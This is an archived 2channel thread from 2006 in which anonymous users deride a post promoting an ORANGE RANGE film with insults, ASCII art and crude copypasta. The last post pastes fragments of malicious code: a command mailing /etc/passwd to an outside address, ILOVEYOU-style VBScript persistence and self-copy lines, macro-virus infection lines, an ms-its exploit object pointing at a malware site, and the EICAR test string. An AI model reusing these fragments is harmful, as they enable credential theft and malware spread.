2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ORANGE RANGEのチョケラッチョ!!!

1 :訴える名無しさん。:2006/04/22(土) 16:12:50 ID:rtDFz0JL
ニッポンで一番いいバンドが
ハリウドに負けないヒップホップ映画をつくったよ♪

みんな見てね〜
http://tv8.2ch.net/test/read.cgi/cinema/1144839104/l50#tag159

2 :訴える名無しさん。:2006/04/22(土) 16:14:04 ID:???
 あーっとここで>>1をスルー!!!
        r'::::::::i
         トーf/__
      /  イ| 、ヽ
      //_〉 l_l i_ノ、
\\ (_ニノ 〉____〉〉 〉
      /    } /             ,_-‐、
     /\/,ー 'ヾ          i"_Y 〈i
     〈  < /              ゝ^-'"
     \i"ヽ、  \\     //
     ├ i\i カ      ,、
      |_,,i ノ_ソ    )     ゝ


3 :訴える名無しさん。:2006/04/22(土) 17:04:48 ID:???
>>1よ。お前みたいな奴をみると、あの日のことを思い出すよ。

2001年8月25日。2ちゃんが本格的に閉鎖になりかけた日だよ。
転送量が多すぎて、費用が月700万もかかってるって発表されて、
「数日中に閉鎖」って予告されてさ、 その日のうちにあっちこっちの板が封鎖されてた日だよ。
あのときのUNIX板の住人、カッコよかったんだぜ。
「総力を結集」ってのはまさにああいう状態だよ。
転送量を1/3に削減しないと閉鎖、ってもんだから、新しいプログラム組んでさ、
そしたらほんの何時間かで完成したんだよ。それが聞いてくれよ、目標は1/3だったのに
1/16まで圧縮に成功しやがったんだよ。職人技なんてもんじゃねえよ、神技だよ。
でもよ、そうやって頑張る人がいた一方で、「ボクの肛門も閉鎖されそうです」とか
駄スレ立ててたバカも いたわけだよ。ちょうど、今のお前みたいにな。
だからよ、俺たちは総力を結集して、お前のバカ度を1/16に圧縮しようと思うよ。
ま、圧縮後でもお前のバカ度はこの世に生かしておくことのできないレベルだけどな。


4 :訴える名無しさん。:2006/04/22(土) 17:16:04 ID:jeUjUOLa
ホントにマジな糞スレ発見。
4ゲト

5 :訴える名無しさん。:2006/04/22(土) 17:27:58 ID:AA2aTl63
おまえみたいなカスは将来就職に困るよ
あと結婚も。市ね

6 :訴える名無しさん。:2006/04/22(土) 17:43:51 ID:???
>>1
このたびは3度もこのような機会を設けて頂き大変恐縮であります。
このタレントレベルならキスはOKだろうという私の安易な考えが、
あなたを傷つけてしまったことを深く謝罪したいと思います。
事の発端は史子が収録にやってきた際
「とんでもないオサセがやってきた!」
と思ってしまったことに始まりがあるのです。
そもそもオサセというのは誰にでも体を許す女性のことでそんな女が来たらと思ったら
「アラいいですね。」が何度も何度も押し寄せてきてしまいまして、
5回目の「アラいいですね」まで待てなくなってしまい、最初のキスを仕掛けることになってしまいました。
さらに収録中あなたはこのタレントレベルではありえないようないっちょ前のフェロモンを出してきたので
僕の中に「年の割には好き者なんだ」か、「なんだこの××××!」という思いがよぎり、
2度目3度目のキスを迫るという形になってしまいました。
今回私的には「このタレントレベルでもキスはないんだな」
という事がわかったことは大きな勉強になりました。
ガキの使い総合演出・世界のヘイポー


7 :訴える名無しさん。:2006/04/23(日) 15:01:08 ID:???
チェケラッチョ!!
http://music4.2ch.net/test/read.cgi/hiphop/1145443877/
重複

8 :訴える名無しさん。:2006/04/23(日) 18:00:24 ID:???
380 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/04/23(日) 17:50:24
36 名前:q^^[] 投稿日:2006/04/23(日) 10:33:37
121 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/08/20(土) 03:58:12
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.Copy^^^^File f1.path, f1.path+"l"
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


6 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)